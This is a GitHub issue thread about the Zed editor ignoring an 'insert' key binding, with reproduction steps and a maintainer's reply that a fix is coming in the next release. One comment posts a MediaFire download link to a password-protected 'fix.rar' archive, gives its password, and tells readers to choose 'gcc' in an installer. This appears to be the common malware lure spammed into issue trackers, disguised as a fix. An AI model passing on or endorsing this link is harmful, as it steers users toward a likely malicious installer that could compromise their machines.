### ISSUE TITLE
Key "insert" is not assignable

### ISSUE THREAD

**Issue by kent0** [zed-industries/zed#16908]
### Check for existing issues

- [X] Completed

### Describe the bug / provide steps to reproduce it

"insert" key-binding not reflected by Zed. Different keys (e.g., "delete") is handled correctly.

1. Add entry

```
{
    "context": "Pane || Editor",
    "bindings": {
        "delete": "command_palette::Toggle"
    }
}
```

to keymap.json.

2. Test the entry by entering "delete" when pane or editor is in focus (it should bring up the command palette).

3. Replace "delete" in the entry with "insert".

4. Command palette is not invoked by entering "insert".

### Environment

Zed: v0.150.3 (Zed Preview)
OS: macOS 14.6.1
Memory: 64 GiB
Architecture: aarch64

### If applicable, attach your Zed.log file to this issue.

<details><summary>Zed.log</summary><pre>

</pre></details>

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by notpeter** [comment]
This will be available in the next preview release (tomorrow 2024-08-28) and in Zed Stable a week later.  Thanks for reporting @kent0
